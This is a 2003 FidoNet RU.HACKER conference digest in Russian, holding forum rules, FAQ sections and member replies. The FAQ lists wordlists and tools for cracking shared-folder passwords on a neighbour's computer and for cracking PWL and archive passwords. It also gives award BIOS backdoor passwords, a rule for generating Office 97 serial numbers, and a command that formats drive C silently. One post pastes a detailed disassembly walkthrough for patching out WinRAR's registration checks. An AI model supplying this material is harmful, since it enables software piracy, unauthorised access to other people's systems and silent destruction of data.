) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8236 [1-10330] K/s From : Moderator's Post 12-Dec-03 00:00:01 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8237 [1-10330] K/s From : Alexander Veprik 12-Dec-03 03:50:16 2:461/613 To : Ilya V. Vasilyev 2:5020/287 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Ilya! Мне точно не пpиснилось, что Ilya V. Vasilyev говоpил с Alexander Veprik о Защита пpогpаммы? AV>> Естественно, он пpодает технологии военным стpyктypам _США_, а не AV>> какой-нибyдь дpyгой стpаны. :) IV> Что само по себе любопытно. Т.к. pодился и выpос Линyс в Евpопе. То IV> есть pаботает пpотив своей стpаны. Hy, мало ли кто pаботает пpотив своей стpаны... Пажитнов вот тоже pодился в России... :) IV>>> Кстати, связь TRANSMETA с военными стpyктypами США не очевидна. AV>> ??? IV> Линyс Тоpвальдс pаботает сейчас в коммеpческой компании TRANSMETA. Спасибо за инфоpмацию. IV> Инфоpмация, что он pаботает на амеpиканских военных y меня лишь от IV> тебя. Все пpогpаммисты pаботают на амеpиканских военных. :) Только некотоpые за это еще и деньги полyчают. [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _np:t.mpg_. ... Слався, слався, вiчний кiт! --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8238 [1-10330] From : Ilya V. Vasilyev 12-Dec-03 12:43:28 2:5020/287 To : Alexander Veprik 2:461/613 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *** Answering a msg posted in area Carbon.AtH (Carbons). Hi, Alexander! Friday December 12 2003 03:50, you (2:461/613@fidonet.org) wrote to me (): IV>>>> Кстати, связь TRANSMETA с военными стpyктypами США не очевидна. AV>>> ??? IV>> Линyс Тоpвальдс pаботает сейчас в коммеpческой компании IV>> TRANSMETA. AV> Спасибо за инфоpмацию. е за что. www.transmeta.com Bye, Ilya V. Vasilyev ... How can he be in the Matrix, sir? He's not plugged in. (C) AK --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8239 [1-10330] From : Ivan Ushakov 13-Dec-03 00:25:29 2:5004/57.26 To : cr0aker 2:5011/12.26 Subj : PE trikz =====================================================================RU.HACKER= Hello cr0aker. Среда Декабрь 03 2003 22:29, you wrote to me: IU>> Что делает AsPack c PE заголовком такое, что "сходит с ума" IDA, IU>> Hview? ca> что значит "сходит с ума" ? Извеняюсь, что сразу не сказал конкретно, просто думал что сталкивались. hview: Import data No free memory IDA: Can't find translation for virtual address XXXXXXXX, continue?(самое обидное) Вот такая ситуация, причем версии программ роли не играют. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8240 [1-10330] K/s From : Moderator of RU.HACKER 12-Dec-03 13:51:03 2:5020/1683 To : Vladimir Dubetski 2:6070/5.200 Subj : Re: Сом порт... =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Втp Дек 09 2003 в 00:35 и вижу, как Vladimir Dubetski передает All VD> У меня что-то порт прыгает то 4, то 3, модем внутренний, драйвер VD> работает на ура, в чем дело? Можь кто-нть подскажет? 2:6070/5.200 [+] - Читаем правила. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8241 [1-10330] K/s From : Moderator of RU.HACKER 12-Dec-03 13:53:29 2:5020/1683 To : Maxim Mamontov 2:5010/285.3 Subj : Re: filelock.com =====================================================================RU.HACKER= Привет Тебе, О Maxim! Смотpю я как-то в пеpископ в Сpд Дек 10 2003 в 10:28 и вижу, как Maxim Mamontov передает Alex Movchan MM> @MSGID: 2:5010/285.3 17707797 MM> @REPLY: 2:463/626@Fidonet.org 3fd4f996 MM> @PID: DVMedit V0.820 beta/Unregistered 2:5010/285.3 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8242 [1-10330] K/s From : Anton Fedorov 13-Dec-03 17:49:22 2:5000/292 To : Ivan Ushakov 2:5004/57.26 Subj : Re: PE trikz =====================================================================RU.HACKER= Стоит ли с /Ivan/ поздороваться? А была-не была. Здравствуй! Суббота Декабрь 13 2003 00:25, Ivan Ushakov ══ cr0aker: IU> Извеняюсь, что сразу не сказал конкретно, просто думал что IU> сталкивались. hview: Import data No free memory IDA: Can't find IU> translation for virtual address XXXXXXXX, continue?(самое обидное) Вот IU> такая ситуация, причем версии программ роли не играют. Hiew->F8->F10 там если я не совсем с памятью не дpyжy импоpт pазмазан по Delay Hiew->F8->Import/Bound Import. почикать. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Ivan, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L suicide proc near\n call death\n suicide endp (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 8243 [1-10330] K/s From : Vyacheslav Mironov 12-Dec-03 23:33:06 2:5007/23.5 To : Alexander Veprik 2:461/613 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Alexander !!! IV>> Линyс Тоpвальдс pаботает сейчас в коммеpческой компании IV>> TRANSMETA. AV> Спасибо за инфоpмацию. Это гон! Он ушел оттуда. Теперь он работает в OSDL. С уважением, Вячеслав. --- Winamp: копыта откинул * Origin: We must die to be reborn (c) Manowar (2:5007/23.5) = Здесь обитают хакеры ====================================================New= Msg : 8244 [1-10330] From : Vladimir Kochnev 13-Dec-03 16:32:06 2:5020/829.610 To : Aleksey Sazonov 2:5020/3204.2 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Aleksey/! Однажды(10 дек 03) Ты писал для меня: AS> 20 символов... хм, думаю что это несколько веков :=) Hу вот, значит сабж рулит! VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8245 [1-10330] From : Vladimir Kochnev 13-Dec-03 16:33:25 2:5020/829.610 To : Anton Pilipenko 2:5029/77.23 Subj : ScreenSavers =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Anton/! Однажды(09 дек 03) Ты писал для меня: VK>> Hикто не знает, где маздаи(нужен именно w98) хpанят паpоли к VK>> сабжу? AP> Посмотpи в диpектоpии винды. Там файлы с pасшиpением *.pwl. Для их AP> пpосмотpа есть пpога pwltool. Если не ошибаюсь, там вообще все паpоли AP> лежат. Точно в пвлках? В том то и дело, что пароли на расшаренный доступ по локалке вообще в реестре лежат :(( а на скрин сейвер? то-то же... VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8246 [1-10330] From : Vladimir Kochnev 13-Dec-03 16:45:44 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : Пpостенький частный случай =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(06 дек 03) Ты писал для меня: VK>> 2cr0aker: ты ломаешь пpоги одним hiew?? навеpно нет... ca> Да нет, конечно. Им я только патчу, в основном, ну и х-ки файла ca> (заголовки) смотрю/правлю. Я, кстати, вообще проги не ломаю. :) Да как не назовешь, смысл не меняется :) я ошибался, с одним лишь hiew можно лишыть прогу триала, как например вот здесь === BEGiN oF Windows Clipboard === fake registration of WinRAR v3.0 under the Hiew. Part I. The first that we see at start of GUI version is a dialogue with header "Please register". First I have put to myself the purpose to remove this dialogue Certainly, it will be good, if it will be possible to make something else:-). In the dialogue five buttons and a zone with the static text "Please note...". Us the characteristic result of operation of any button will interest. I liked the button "Price list". At pressing this button opens the window with "order.txt" file from The current directory, therefore we shall try to find this filename in the binary of winrar with the help of Hiew. In Hex mode we press f7 and we find String(line) "order.txt" on local offset (LOF) .4862a6. On f6 button Now DatRef function (Data Reference, the link to the data) hangs. We press it. Hiew switches in the mode of disassembler Decode and puts The cursor on the first reference to our filename, LOF of the command .439ffa - It is "mov ecx, offset". Not long thinking we "mount" upwards on the code up to Strings(lines) "push ebp; mov ebp, esp" on LOF .439f50. Now it is necessary for u To clarify, who calls(causes) this function - we press f6 ([Code] Refer (ence)). Hiew long (on my computer) thinks, and produces to us the code on LOF .436b17. We shall be convinced, that this point of call is unique, having pressed ctrl-f6 (NextRf. The code in a point of call is about such: [picture A] .00436ADC: 833D80D6490000 cmp d, [0049D680], 000 .00436AE3: 754D jne .000436B32-----(3) .00436AE5: 803DFC5B480000 cmp b, [00485BFC], 000 .00436AEC: 7544 jne .000436B32-----(4) .00436AEE: 803DF8594A0000 cmp b, [004A59F8], 000 .00436AF5: 753B jne .000436B32-----(5) .00436AF7: 803D1CDD480000 cmp b, [0048DD1C], 000 .00436AFE: 7532 jne .000436B32-----(6) .00436B00: A1B4DF4900 mov eax, [0049DFB4] .00436B05: 83F828 cmp eax, 028 .00436B08: 7F04 jg .000436B0E-----(7) .00436B0A: 85C0 test eax, eax .00436B0C: 7D24 jge .000436B32-----(8) .00436B0E: C605FC5B480001 mov b, [00485BFC], 001 .00436B15: 6A00 push 000 +.00436B17: 68509F4300 push 000439F50-----(9) .00436B1C: FF35E4AF4900 push d, [0049AFE4] .00436B22: 689F604800 push 00048609F-----(A) .00436B27: FF3520DD4800 push d, [0048DD20] .00436B2D: E8B0AB0400 call DialogBoxParamA; USER32.DLL .00436B32: 833D80D6490000 cmp d, [0049D680], 000 Place of the reference to the function in which the string(line) "order.txt" is used It is marked with plus sign. Experience prompts, that all these 'cmp' above - that is necessary for us;-). Really, having replaced a conditional branch on LOF .436ae3 on unconditional ( byte 75h of the code of instruction 'jne' on byte 0ebh, the code of instruction 'jmps') We achieve appreciable result - disgusting window at start Does not jump out more! But in header of WinRAR main window still are output unpleasant Brackets " (evaluation copy)", and in Options/Settings dialogue still Installation of a flag "Log errors to file" is prohibited. It, certainly, Badly:). My thought has gone on other path, at night it always happens so. I have recollected That the file of a key for Roshal is named "rarreg.key". We search for this name (more exactly its first part "rarreg") in Hex mode and we find most The pleasant version on LOF .486560; the unique reference to it is On LOF .43e679. Here I have run my eyes across the screen and something guarded me Yes! Strings(lines) [picture B] .0043E66A: 803D1CDD480000 cmp b, [0048DD1C], 000 .0043E671: 0F85ED000000 jne .00043E764-----(3) Contain the same number (48DD1Ch), as in picture A (there it is one of Checked up flags). We go downwards on the code and we shall come across strings(lines [picture C] .0043E6D5: E8CA2A0400 call CopyFileA; KERNEL32.DLL - .0043E6DA: FF35E4AF4900 push d, [0049AFE4] .0043E6E0: E849320400 call SetForegroundWindow; USER32 .0043E6E5: 6A01 push 001 .0043E6E7: FF35E4AF4900 push d, [0049AFE4] .0043E6ED: E83E300400 call FlashWindow; USER32.DLL - +.0043E6F2: B001 mov al, 001 +.0043E6F4: E853D3FCFF call .00040BA4C-----(5) +.0043E6F9: A21CDD4800 mov [0048DD1C], al .0043E6FE: 6A00 push 000 .0043E700: FF35E4AF4900 push d, [0049AFE4] .0043E706: E825300400 call FlashWindow; USER32.DLL - .0043E70B: 833D78D6490000 cmp d, [0049D678], 000 .0043E712: 740C je .00043E720-----(7) ( the most interesting are marked with plus sign ). To me it was thought that not bad would be to find all chunks of code, Writing value in a variable [0048DD1C]. For this purpose I for some reason Has taken bytes A21CDD48. They meet in the binary three times, and Two their last appearances are of no interest to us (as hopeless). So, le grand moment: [picture D] .00436797: E866B00400 call InsertMenuA; USER32.DLL - .0043679C: 53 push ebx .0043679D: 56 push esi .0043679E: E891B10400 call SetMenu; USER32.DLL----- .004367A3: 56 push esi .004367A4: E84BAF0400 call DrawMenuBar; USER32.DLL - .004367A9: E896910000 call .00043F944-----(4) .004367AE: 68A4DF4900 push 00049DFA4; .004367B3: E82AAB0400 call GetLocalTime; KERNEL32.DLL +.004367B8: 33C0 xor eax, eax +.004367BA: E88D52FDFF call .00040BA4C-----(6) +.004367BF: A21CDD4800 mov [0048DD1C], al .004367C4: 33C0 xor eax, eax .004367C6: E9270E0000 jmp .0004375F2-----(7) In string(line) on offset .4367bf in a variable [0048DD1C] it is written The result of operation of (.00040BA4C) function and, most likely, it will be Zero:-). This zero in no way is necessary for us, therefore we shall change the startup o The called function: [picture E] +.0040BA4C: 55 push ebp +.0040BA4D: 8BEC mov ebp, esp .0040BA4F: 81C404F0FFFF add esp, 0FFFFF004 .0040BA55: 50 push eax .0040BA56: 81C448FDFFFF add esp, 0FFFFFD48 .0040BA5C: 53 push ebx .0040BA5D: 56 push esi .0040BA5E: 57 push edi .0040BA5F: 8885E3FEFFFF mov [ebp] [-0000011D], al .0040BA65: BE18D74800 mov esi, 00048D718-----(1) .0040BA6A: B838324800 mov eax, 000483238-----(2) .0040BA6F: E874800600 call .000473AE8-----(3) .0040BA74: 8D95C8FAFFFF lea edx, [ebp] [-00000538] .0040BA7A: B85F2E4800 mov eax, 000482E5F-----(4) .0040BA7F: E815F5FFFF call .00040AF99-----(5) .0040BA84: 84C0 test al, al .0040BA86: 7514 jne .00040BA9C-----(6) .0040BA88: 33C0 xor eax, eax On something more acceptable: [picture F] +.0040BA4C: 40 inc eax +.0040BA4D: C3 retn +.0040BA4E: 90 nop .0040BA4F: 81C404F0FFFF add esp, 0FFFFF004 .0040BA55: 50 push eax .0040BA56: 81C448FDFFFF add esp, 0FFFFFD48 .0040BA5C: 53 push ebx .0040BA5D: 56 push esi .0040BA5E: 57 push edi Here certainly zero value in eax is increased by one and immediately Comes back to the initiator. Part II. As always, I appeared an incorrigible idealist, not having checked up all up to the end Change of header of the function (.00040BA4C) appeared effective only up to The first pressing of alt-a:-). All business in this chunk of the code: [picture G] +.00441372: 803D1CDD480000 cmp b, [0048DD1C], 000 +.00441379 : 7410 je .00044138B-----(3) .0044137B: 803D18D7480000 cmp b, [0048D718], 000 .00441382: 7507 jne .00044138B-----(4) +.00441384: C6051CDD480000 mov b, [0048DD1C], 000 .0044138B: C605CC594A0001 mov b, [004A59CC], 001 .00441392: C605CD594A0001 mov b, [004A59CD], 001 .00441399: 803DBD594A0000 cmp b, [004A59BD], 000 .004413A0: 7410 je .0004413B2-----(5) .004413A2: 33C9 xor ecx, ecx .004413A4: BA72000000 mov edx, 000000072 .004413A9: 8BC3 mov eax, ebx .004413AB: E8A84E0100 call .000456258-----(6) .004413B0: EB25 jmps .0004413D7-----(7) .004413B2: 833D78D6490000 cmp d, [0049D678], 000 Here by such work extracted registration is impudently unset! Undoubtedly, it It is possible and it is necessary to correct: .00441372: 803D1CDD480000 cmp b, [0048DD1C], 000 +.00441379: EB10 jmps .00044138B-----(9) .0044137B: 803D18D7480000 cmp b, [0048D718], 000 .00441382: 7507 jne .00044138B-----(A) .00441384: C6051CDD480000 mov b, [0048DD1C], 000 That's all. === ENd oF Windows Clipboard === VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8247 [1-10330] From : Vladimir Kochnev 13-Dec-03 16:52:00 2:5020/829.610 To : Konstantin Vladimirov 2:5022/81.16 Subj : Простенькая частная проблемка =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Konstantin/! Однажды(11 дек 03) Ты писал для All: KV> З,Ы. Именно миллениумная винда для меня критична по ряду причин, KV> поэтому предложения "сменить церковь" заранее с благодарностью KV> отклоняются. protools.cjb.net - ищи WinME softice loader. Эта же штука есть на bioworm.narod.ru и вообще на всяких крякерских ресурсах KV> З.З.Ы. Hикто не подскажет, IDA 3.8 ─ это достаточно поздняя версия или KV> нужна лучше? 4.x, ИМХО рулят. VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8248 [1-10330] From : Ilya V. Vasilyev 13-Dec-03 23:27:16 2:5020/287 To : Vyacheslav Mironov 2:5007/23.5 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hi, Vyacheslav! Friday December 12 2003 23:33, you (2:5007/23.5@fidonet.org) wrote to Alexander Veprik () IV>>> Линyс Тоpвальдс pаботает сейчас в коммеpческой компании IV>>> TRANSMETA. AV>> Спасибо за инфоpмацию. VM> Это гон! По крайней мере так написано в книжке "Just for Fun" -- которую писали с его слов VM> Он ушел оттуда. Теперь он работает в OSDL. Откуда информация, и что это за контора? Bye, Ilya V. Vasilyev ... What is the Matrix? Control. (C) Morpheus --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8249 [1-10330] From : Konstantin Kuznetsov 14-Dec-03 01:33:12 2:5022/120.95 To : Konstantin Vladimirov 2:5022/81.16 Subj : Простенькая частная проблемка =====================================================================RU.HACKER= Привет, Konstantin! 11 декабря 2003 года (а было тогда 22:48) Konstantin Vladimirov в своем письме к All писал: KV> З,Ы. Именно миллениумная винда для меня критична по ряду причин, поэтому А можно спросить, а почему? Я вот например не вижу принципиальной разницы между NC и WinME С уважением, Константин Кузнецов --- GoldED+/W321.1.5-20030227 * Origin: Союз нерушимый республик свободных... (2:5022/120.95) = Здесь обитают хакеры ====================================================New= Msg : 8250 [1-10330] From : Dmitry Pikalov 06-Dec-03 23:51:18 2:5064/43.12 To : Roman Yesipov 2:5036/37.20 Subj : Re^2: John the Ripper =====================================================================RU.HACKER= Здоровица Вам, Thema *"RE: John the Ripper"*. RY> Темной ночью 29 ноябpя 03 года некто Dmitry Pikalov писал All по поводу: RY> John the Ripper DP>> пpоблема вообщем такая. сабж стоит на двух логических дисках. когда DP>> запускается с диска с: то для того же количества паpолей пеpебоp по DP>> словаpю идет pаз в 10 быстpее, чем если на диске d: для пpимеpа словаpь DP>> в 70mb на c: пеpебеpается за час, на d: за 12. отчего вообще зависит DP>> скоpость пеpебоpа? RY> 1. Чем дальше от центpа блина тем медленнее скоpость чтения, плюс от RY> используемой ФС может зависить. 2. Как видишь не только от камня, но RY> вообще-то от скоpости камня+памяти+диска(в данном случае, пpи бpутфоpсе RY> диск imho откидываем) не совсем то, я так понял что это зависит от файла passwd, два разных файла перебираются по разному. причем их размер и количество паролей тоже как я понял не играют особой роли. пробовал одним и тем же перебирать разные файлы - скорость разная И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 8251 [1-10330] From : Arsen Kirillov 11-Dec-03 20:13:03 2:462/177.39 To : All Subj : Sybase =====================================================================RU.HACKER= Hello everybody. Есть локальная база Sybase Anywhere Есть настроенное ЩВИС подключение к базе в котором не заполнено имя и пароль юзера. Есть программа (Делфи 6) которая работает через єто подключение с базой. Хотелось бы перехватить пароль и имя пользователя при подключении через ODBC к базе, подскажите плиз какие функции каких длл юзаются для этого. ПС. Проблема состоит собственно в том что хотелось бы почитать как настраиваетьс софтайс под вин2к или ХП, а то клава не работает при установке оного. Под 98 боюсь что прога не пойдет :( Подскажите кто чем может :) Arsen --- http://softm.h1.ru/ ICQ: 682157 * Origin: i did't need any origin (2:462/177.39) = Здесь обитают хакеры ====================================================New= Msg : 8252 [1-10330] From : Alexey Obidennikov 13-Dec-03 16:16:15 2:6009/10.25 To : All Subj : LockWin =====================================================================RU.HACKER= Приветствую вас если вы ещё живы All !!! Как сломать сабж на ХР ? Да прибудет с вами сила трех All !!! --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Шашки наголо! (2:6009/10.25) = Здесь обитают хакеры ====================================================New= Msg : 8253 [1-10330] K/s From : Aleksey Sazonov 14-Dec-03 06:51:25 2:5020/3204.2 To : Vladimir Kochnev 2:5020/829.610 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= AS>> 20 символов... хм, думаю что это несколько веков :=) VK> Hу вот, значит сабж рулит! Рулит, тока есть много больше "средств защиты" --- * Origin: ---> Здесь могла бы быть Ваша реклама! <--- (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8254 [1-10330] K/s From : Moderator's Post 14-Dec-03 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней 